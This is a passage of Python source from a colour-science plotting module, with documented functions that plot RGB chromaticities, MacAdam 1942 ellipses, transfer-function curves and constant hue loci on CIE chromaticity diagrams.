Plot given *RGB* colourspace array in the *Chromaticity Diagram* according
to given method.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable
Callable responsible for drawing the *Chromaticity Diagram*.
method
*Chromaticity Diagram* method.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
>>> plot_RGB_chromaticities_in_chromaticity_diagram(RGB, "ITU-R BT.709")
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram
"""
RGB = np.reshape(as_float_array(RGB), (-1, 3))
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
scatter_settings = {
"s": 40,
"c": "RGB",
"marker": "o",
"alpha": 0.85,
"zorder": CONSTANTS_COLOUR_STYLE.zorder.midground_scatter,
"apply_cctf_encoding": True,
}
if scatter_kwargs is not None:
scatter_settings.update(scatter_kwargs)
settings = dict(kwargs)
settings.update({"axes": axes, "show": False})
colourspace = cast(
RGB_Colourspace,
first_item(filter_RGB_colourspaces(colourspace).values()),
)
settings["colourspaces"] = [colourspace, *settings.get("colourspaces", [])]
chromaticity_diagram_callable(**settings)
use_RGB_colours = str(scatter_settings["c"]).upper() == "RGB"
apply_cctf_encoding = scatter_settings.pop("apply_cctf_encoding")
if use_RGB_colours:
RGB = RGB[RGB[:, 1].argsort()]
scatter_settings["c"] = np.clip(
np.reshape(
RGB_to_RGB(
RGB,
colourspace,
CONSTANTS_COLOUR_STYLE.colour.colourspace,
apply_cctf_encoding=apply_cctf_encoding,
),
(-1, 3),
),
0,
1,
)
XYZ = RGB_to_XYZ(RGB, colourspace)
if method == "cie 1931":
ij = XYZ_to_xy(XYZ)
elif method == "cie 1960 ucs":
ij = UCS_to_uv(XYZ_to_UCS(XYZ))
elif method == "cie 1976 ucs":
ij = Luv_to_uv(
XYZ_to_Luv(XYZ, colourspace.whitepoint), colourspace.whitepoint
)
axes.scatter(ij[..., 0], ij[..., 1], **scatter_settings)
settings.update({"show": True})
settings.update(kwargs)
return render(**settings)
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable_CIE1931: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931
),
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspace array in the *CIE 1931 Chromaticity Diagram*.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable_CIE1931
Callable responsible for drawing the *CIE 1931 Chromaticity Diagram*.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
>>> plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931(
... RGB, "ITU-R BT.709"
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram_CIE1931.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1931"})
return plot_RGB_chromaticities_in_chromaticity_diagram(
RGB,
colourspace,
chromaticity_diagram_callable_CIE1931,
scatter_kwargs=scatter_kwargs,
**settings,
)
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable_CIE1960UCS: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS
),
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspace array in the
*CIE 1960 UCS Chromaticity Diagram*.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable_CIE1960UCS
Callable responsible for drawing the
*CIE 1960 UCS Chromaticity Diagram*.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
>>> plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS(
... RGB, "ITU-R BT.709"
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram_CIE1960UCS.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1960 UCS"})
return plot_RGB_chromaticities_in_chromaticity_diagram(
RGB,
colourspace,
chromaticity_diagram_callable_CIE1960UCS,
scatter_kwargs=scatter_kwargs,
**settings,
)
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable_CIE1976UCS: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS
),
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspace array in the
*CIE 1976 UCS Chromaticity Diagram*.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable_CIE1976UCS
Callable responsible for drawing the
*CIE 1976 UCS Chromaticity Diagram*.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
>>> plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS(
... RGB, "ITU-R BT.709"
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram_CIE1976UCS.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1976 UCS"})
return plot_RGB_chromaticities_in_chromaticity_diagram(
RGB,
colourspace,
chromaticity_diagram_callable_CIE1976UCS,
scatter_kwargs=scatter_kwargs,
**settings,
)
def ellipses_MacAdam1942(
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931"
) -> List[NDArrayFloat]:
"""
Return *MacAdam (1942) Ellipses (Observer PGN)* coefficients according to
given method.
Parameters
----------
method
Computation method.
Returns
-------
:class:`list`
*MacAdam (1942) Ellipses (Observer PGN)* coefficients.
Examples
--------
>>> ellipses_MacAdam1942()[0] # doctest: +SKIP
array([ 1.60000000e-01, 5.70000000e-02, 5.00000023e-03,
1.56666660e-02, -2.77000015e+01])
"""
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
if method == "cie 1931":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy
elif method == "cie 1960 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_UCS_uv(xy)
elif method == "cie 1976 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_Luv_uv(xy)
x, y, _a, _b, _theta, a, b, theta = tsplit(DATA_MACADAM_1942_ELLIPSES)
ellipses_coefficients = []
for i in range(len(theta)):
xy = point_at_angle_on_ellipse(
np.linspace(0, 360, 36),
[x[i], y[i], a[i] / 60, b[i] / 60, theta[i]],
)
ij = xy_to_ij(xy)
ellipses_coefficients.append(
ellipse_coefficients_canonical_form(ellipse_fitting(ij))
)
return ellipses_coefficients
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable: Callable = plot_chromaticity_diagram,
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*Chromaticity Diagram* according to given method.
Parameters
----------
chromaticity_diagram_callable
Callable responsible for drawing the *Chromaticity Diagram*.
method
*Chromaticity Diagram* method.
chromaticity_diagram_clipping
Whether to clip the *Chromaticity Diagram* colours with the ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
be either a single dictionary applied to all the ellipses with same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram
"""
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
settings = dict(kwargs)
settings.update({"axes": axes, "show": False})
ellipses_coefficients = ellipses_MacAdam1942(method=method)
if chromaticity_diagram_clipping:
diagram_clipping_path_x = []
diagram_clipping_path_y = []
for coefficients in ellipses_coefficients:
coefficients = np.copy(coefficients) # noqa: PLW2901
coefficients[2:4] /= 2
x, y = tsplit(
point_at_angle_on_ellipse(
np.linspace(0, 360, 36),
coefficients,
)
)
diagram_clipping_path_x.append(x)
diagram_clipping_path_y.append(y)
diagram_clipping_path = np.rollaxis(
np.array([diagram_clipping_path_x, diagram_clipping_path_y]), 0, 3
)
diagram_clipping_path = Path.make_compound_path_from_polys(
diagram_clipping_path
).vertices
settings.update({"diagram_clipping_path": diagram_clipping_path})
chromaticity_diagram_callable(**settings)
ellipse_settings_collection = [
{
"color": CONSTANTS_COLOUR_STYLE.colour.cycle[4],
"alpha": 0.4,
"linewidth": colour_style()["lines.linewidth"],
"zorder": CONSTANTS_COLOUR_STYLE.zorder.midground_polygon,
}
for _ellipses_coefficient in ellipses_coefficients
]
if ellipse_kwargs is not None:
update_settings_collection(
ellipse_settings_collection,
ellipse_kwargs,
len(ellipses_coefficients),
)
for i, coefficients in enumerate(ellipses_coefficients):
x_c, y_c, a_a, a_b, theta_e = coefficients
ellipse = Ellipse(
(x_c, y_c),
a_a,
a_b,
angle=theta_e,
**ellipse_settings_collection[i],
)
axes.add_artist(ellipse)
settings.update({"show": True})
settings.update(kwargs)
return render(**settings)
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931(
chromaticity_diagram_callable_CIE1931: Callable = (
plot_chromaticity_diagram_CIE1931
),
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*CIE 1931 Chromaticity Diagram*.
Parameters
----------
chromaticity_diagram_callable_CIE1931
Callable responsible for drawing the *CIE 1931 Chromaticity Diagram*.
chromaticity_diagram_clipping
Whether to clip the *CIE 1931 Chromaticity Diagram* colours with the
ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
be either a single dictionary applied to all the ellipses with same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram`},
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram_CIE1931.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1931"})
return plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable_CIE1931,
chromaticity_diagram_clipping=chromaticity_diagram_clipping,
ellipse_kwargs=ellipse_kwargs,
**settings,
)
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS(
chromaticity_diagram_callable_CIE1960UCS: Callable = (
plot_chromaticity_diagram_CIE1960UCS
),
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*CIE 1960 UCS Chromaticity Diagram*.
Parameters
----------
chromaticity_diagram_callable_CIE1960UCS
Callable responsible for drawing the
*CIE 1960 UCS Chromaticity Diagram*.
chromaticity_diagram_clipping
Whether to clip the *CIE 1960 UCS Chromaticity Diagram* colours with
the ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
be either a single dictionary applied to all the ellipses with same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram`},
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram_CIE1960UCS.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1960 UCS"})
return plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable_CIE1960UCS,
chromaticity_diagram_clipping=chromaticity_diagram_clipping,
ellipse_kwargs=ellipse_kwargs,
**settings,
)
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS(
chromaticity_diagram_callable_CIE1976UCS: Callable = (
plot_chromaticity_diagram_CIE1976UCS
),
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*CIE 1976 UCS Chromaticity Diagram*.
Parameters
----------
chromaticity_diagram_callable_CIE1976UCS
Callable responsible for drawing the
*CIE 1976 UCS Chromaticity Diagram*.
chromaticity_diagram_clipping
Whether to clip the *CIE 1976 UCS Chromaticity Diagram* colours with
the ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
be either a single dictionary applied to all the ellipses with same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram`},
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram_CIE1976UCS.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1976 UCS"})
return plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable_CIE1976UCS,
chromaticity_diagram_clipping=chromaticity_diagram_clipping,
ellipse_kwargs=ellipse_kwargs,
**settings,
)
@override_style()
def plot_single_cctf(
cctf: Callable | str, cctf_decoding: bool = False, **kwargs: Any
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given colourspace colour component transfer function.
Parameters
----------
cctf
Colour component transfer function to plot. ``function`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_passthrough` definition.
cctf_decoding
Plot the decoding colour component transfer function instead.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_functions`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_single_cctf("ITU-R BT.709") # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Single_CCTF.png
:align: center
:alt: plot_single_cctf
"""
settings: Dict[str, Any] = {
"title": f"{cctf} - {'Decoding' if cctf_decoding else 'Encoding'} CCTF"
}
settings.update(kwargs)
return plot_multi_cctfs([cctf], cctf_decoding, **settings)
@override_style()
def plot_multi_cctfs(
cctfs: Callable | str | Sequence[Callable | str],
cctf_decoding: bool = False,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given colour component transfer functions.
Parameters
----------
cctfs
Colour component transfer function to plot. ``cctfs`` elements can be
of any type or form supported by the
:func:`colour.plotting.common.filter_passthrough` definition.
cctf_decoding
Plot the decoding colour component transfer function instead.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_functions`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_multi_cctfs(["ITU-R BT.709", "sRGB"]) # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Multi_CCTFs.png
:align: center
:alt: plot_multi_cctfs
"""
cctfs_filtered = filter_passthrough(
CCTF_DECODINGS if cctf_decoding else CCTF_ENCODINGS, cctfs
)
mode = "Decoding" if cctf_decoding else "Encoding"
title = f"{', '.join(list(cctfs_filtered))} - {mode} CCTFs"
settings: Dict[str, Any] = {
"bounding_box": (0, 1, 0, 1),
"legend": True,
"title": title,
"x_label": "Signal Value" if cctf_decoding else "Tristimulus Value",
"y_label": "Tristimulus Value" if cctf_decoding else "Signal Value",
}
settings.update(kwargs)
with domain_range_scale("1"):
return plot_multi_functions(cctfs_filtered, **settings)
@override_style()
def plot_constant_hue_loci(
data: ArrayLike,
model: Literal[
"CAM02LCD",
"CAM02SCD",
"CAM02UCS",
"CAM16LCD",
"CAM16SCD",
"CAM16UCS",
"CIE XYZ",
"CIE xyY",
"CIE Lab",
"CIE Luv",
"CIE UCS",
"CIE UVW",
"DIN99",
"Hunter Lab",
"Hunter Rdab",
"ICaCb",
"ICtCp",
"IPT",
"IPT Ragoo 2021",
"IgPgTg",
"Jzazbz",
"OSA UCS",
"Oklab",
"hdr-CIELAB",
"hdr-IPT",
]
| str = "CIE Lab",
scatter_kwargs: dict | None = None,
convert_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given constant hue loci colour matches data such as that from
:cite:`Hung1995` or :cite:`Ebner1998` that are easily loaded with
`Colour - Datasets <https://github.com/colour-science/colour-datasets>`__.
Parameters
----------
data
Constant hue loci colour matches data expected to be an `ArrayLike` as
follows::
[
('name', XYZ_r, XYZ_cr, (XYZ_ct, XYZ_ct, XYZ_ct, ...), \
{metadata}),
('name', XYZ_r, XYZ_cr, (XYZ_ct, XYZ_ct, XYZ_ct, ...), \
{metadata}),
('name', XYZ_r, XYZ_cr, (XYZ_ct, XYZ_ct, XYZ_ct, ...), \
{metadata}),
...
]
where ``name`` is the hue angle or name, ``XYZ_r`` the *CIE XYZ*
tristimulus values of the reference illuminant, ``XYZ_cr`` the
*CIE XYZ* tristimulus values of the reference colour under the
reference illuminant, ``XYZ_ct`` the *CIE XYZ* tristimulus values of
the colour matches under the reference illuminant and ``metadata`` the
dataset metadata.
model
Colourspace model, see :attr:`colour.COLOURSPACE_MODELS` attribute for
the list of supported colourspace models.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
convert_kwargs
Keyword arguments for the :func:`colour.convert` definition.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_functions`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
References
----------
:cite:`Ebner1998`, :cite:`Hung1995`, :cite:`Mansencal2019`
Examples
--------
>>> data = [
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.40920000, 0.28120000, 0.30600000]),
... np.array(
... [
... [0.02495100, 0.01908600, 0.02032900],
... [0.10944300, 0.06235900, 0.06788100],
... [0.27186500, 0.18418700, 0.19565300],
... [0.48898900, 0.40749400, 0.44854600],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.30760000, 0.48280000, 0.42770000]),
... np.array(
... [
... [0.02108000, 0.02989100, 0.02790400],
... [0.06194700, 0.11251000, 0.09334400],
... [0.15255800, 0.28123300, 0.23234900],
... [0.34157700, 0.56681300, 0.47035300],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.39530000, 0.28120000, 0.18450000]),
... np.array(
... [
... [0.02436400, 0.01908600, 0.01468800],
... [0.10331200, 0.06235900, 0.02854600],
... [0.26311900, 0.18418700, 0.12109700],
... [0.43158700, 0.40749400, 0.39008600],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.20510000, 0.18420000, 0.57130000]),
... np.array(
... [
... [0.03039800, 0.02989100, 0.06123300],
... [0.08870000, 0.08498400, 0.21843500],
... [0.18405800, 0.18418700, 0.40111400],
... [0.32550100, 0.34047200, 0.50296900],
... [0.53826100, 0.56681300, 0.80010400],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.35770000, 0.28120000, 0.11250000]),
... np.array(
... [
... [0.03678100, 0.02989100, 0.01481100],
... [0.17127700, 0.11251000, 0.01229900],
... [0.30080900, 0.28123300, 0.21229800],
... [0.52976000, 0.40749400, 0.11720000],
... ]
... ),
... None,
... ],
... ]
>>> plot_constant_hue_loci(data, "CIE Lab") # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Constant_Hue_Loci.png
:align: center
:alt: plot_constant_hue_loci
"""
# TODO: Filter appropriate colour models.
# NOTE: "dtype=object" is required for ragged array support
# in "Numpy" 1.24.0.
data = as_array(data, dtype=object) # pyright: ignore
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
scatter_settings = {
"s": 40,
"c": "RGB",
"marker": "o",
"alpha": 0.85,
"zorder": CONSTANTS_COLOUR_STYLE.zorder.foreground_scatter,
}
if scatter_kwargs is not None:
scatter_settings.update(scatter_kwargs)
convert_kwargs = optional(convert_kwargs, {})
use_RGB_colours = str(scatter_settings["c"]).upper() == "RGB"
colourspace = CONSTANTS_COLOUR_STYLE.colour.colourspace
for hue_data in data:
_name, XYZ_r, XYZ_cr, XYZ_ct, _metadata = hue_data
xy_r = XYZ_to_xy(XYZ_r)
convert_settings = {"illuminant": xy_r}
convert_settings.update(convert_kwargs)
ijk_ct = colourspace_model_axis_reorder(
convert(XYZ_ct, "CIE XYZ", model, **convert_settings), model
)
ijk_cr = colourspace_model_axis_reorder(
convert(XYZ_cr, "CIE XYZ", model, **convert_settings), model
)
ijk_ct *= COLOURSPACE_MODELS_DOMAIN_RANGE_SCALE_1_TO_REFERENCE[model]
ijk_cr *= COLOURSPACE_MODELS_DOMAIN_RANGE_SCALE_1_TO_REFERENCE[model]
def _linear_equation(
x: NDArrayFloat, a: NDArrayFloat, b: NDArrayFloat
) -> NDArrayFloat:
"""Define the canonical linear equation for a line."""
return a * x + b
popt, _pcov = scipy.optimize.curve_fit(
_linear_equation, ijk_ct[..., 0], ijk_ct[..., 1]
)
axes.plot(
ijk_ct[..., 0],
_linear_equation(ijk_ct[..., 0], *popt),
c=CONSTANTS_COLOUR_STYLE.colour.average,
zorder=CONSTANTS_COLOUR_STYLE.zorder.midground_line,
)
if use_RGB_colours:
RGB_ct = XYZ_to_RGB(
XYZ_ct, colourspace, xy_r, apply_cctf_encoding=True
)
scatter_settings["c"] = np.clip(RGB_ct, 0, 1)
RGB_cr = XYZ_to_RGB(
XYZ_cr, colourspace, xy_r, apply_cctf_encoding=True
)
RGB_cr = np.clip(np.ravel(RGB_cr), 0, 1)
else:
scatter_settings["c"] = CONSTANTS_COLOUR_STYLE.colour.dark
RGB_cr = CONSTANTS_COLOUR_STYLE.colour.dark
axes.scatter(ijk_ct[..., 0], ijk_ct[..., 1], **scatter_settings)
axes.plot(
ijk_cr[..., 0],
ijk_cr[..., 1],
"s",
c=RGB_cr,
markersize=CONSTANTS_COLOUR_STYLE.geometry.short * 8,
zorder=CONSTANTS_COLOUR_STYLE.zorder.midground_line,
)
labels = np.array(COLOURSPACE_MODELS_AXIS_LABELS[model])[
as_int_array(colourspace_model_axis_reorder([0, 1, 2], model))
]
settings = {
"axes": axes,
"title": f"Constant Hue Loci - {model}",
"x_label": labels[0],
"y_label": labels[1],
}
settings.update(kwargs)
return render(**settings)
|
94d90bb541221f2bd4b82a7c2fe6c036e60ef410
|
faf7ed9d56d408a261a69fcc9eb3b5f9c6e38873
|
